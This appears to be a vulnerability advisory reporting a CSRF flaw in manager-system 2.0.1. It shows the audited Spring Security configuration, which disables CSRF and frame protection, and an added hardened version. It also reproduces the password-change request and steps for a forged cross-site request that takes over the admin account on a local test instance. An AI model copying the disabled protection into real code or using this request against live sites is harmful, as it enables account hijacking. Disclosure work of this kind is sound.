manager-system
manager-system 2.0.1 has a CSRF vulnerability
Source code name: manager-system
Source code version: 2.0.1
Source code download link: https://github.com/ZeroWdd/manager-system/archive/refs/heads/master.zip
Code Audit:
@Override
protected void configure(HttpSecurity http) throws Exception {
    http.addFilterAfter(dynamicallyUrlInterceptor(), FilterSecurityInterceptor.class)
        .authorizeRequests()
            .antMatchers("/manager/login").permitAll()
            .antMatchers("/mystatic/**", "/layuiadmin/**", "/font-awesome-4.7.0/**").permitAll()
            .antMatchers("/**")
            .fullyAuthenticated()
        .and()
        .formLogin().loginPage("/manager/login").successHandler(loginSuccessHandler).failureHandler(loginFailureHandler)
        .and()
        .headers().frameOptions().disable() // Avoids the "Refused to display in a frame because it set 'X-Frame-Options' to 'DENY'" error
        .and()
        .csrf().disable(); // CSRF protection is switched off for the whole application, including state-changing requests such as POST /manager/editPassword
}
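A hardened version of the audited configure() method, added here as an example and not taken from the project; it assumes the enclosing class extends WebSecurityConfigurerAdapter and that dynamicallyUrlInterceptor(), loginSuccessHandler and loginFailureHandler are the same project members referenced in the original method (they are not repeated here).

```java
// Hardened counterpart of the configure() method shown in the code audit.
// Added example, not the project's own code. Assumes the class extends
// WebSecurityConfigurerAdapter and that dynamicallyUrlInterceptor(),
// loginSuccessHandler and loginFailureHandler exist as in the original class.
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.web.access.intercept.FilterSecurityInterceptor;
import org.springframework.security.web.csrf.CookieCsrfTokenRepository;

@EnableWebSecurity
public class ManagerSecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http.addFilterAfter(dynamicallyUrlInterceptor(), FilterSecurityInterceptor.class)
            .authorizeRequests()
                .antMatchers("/manager/login").permitAll()
                .antMatchers("/mystatic/**", "/layuiadmin/**", "/font-awesome-4.7.0/**").permitAll()
                .antMatchers("/**").fullyAuthenticated()
            .and()
            .formLogin()
                .loginPage("/manager/login")
                .successHandler(loginSuccessHandler)
                .failureHandler(loginFailureHandler)
            .and()
            // sameOrigin() keeps the application's own pages frameable by each other
            // (the problem the original "disable()" comment worked around) without
            // dropping the X-Frame-Options header altogether.
            .headers().frameOptions().sameOrigin()
            .and()
            // CSRF protection stays enabled. The cookie repository issues an XSRF-TOKEN
            // cookie; every state-changing request (POST /manager/editPassword included)
            // must echo that value in the X-XSRF-TOKEN header or the _csrf parameter.
            // A page on another origin cannot read the cookie, so a forged cross-site
            // POST is rejected with 403 before the password is changed.
            .csrf()
                .csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
    }
}
```

Because the original request is sent as an XMLHttpRequest, the front-end must read the XSRF-TOKEN cookie and add it as the X-XSRF-TOKEN header on each POST, which is why the cookie is created with withHttpOnlyFalse().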
Vulnerability exploitation: open http://localhost:8080/manager/index, log in as superadmin/123 and click edit.
Input:
Current password: 123
New password: admin123
Confirm new password: admin123
Click "Modify now".
Corresponding data packet:
POST /manager/editPassword HTTP/1.1
Host: localhost:8080
Content-Length: 53
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manager/password
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=927B6116C0986E8F8132E7EB30578BE1
Connection: keep-alive
password=123&newpassword=admin123&repassword=admin123
Generate a CSRF PoC from this request, open it as the attacker, and click "Submit request".
When I entered the account and password as "superadmin/123", I found that the login failed. The account password has been modified by the attacker.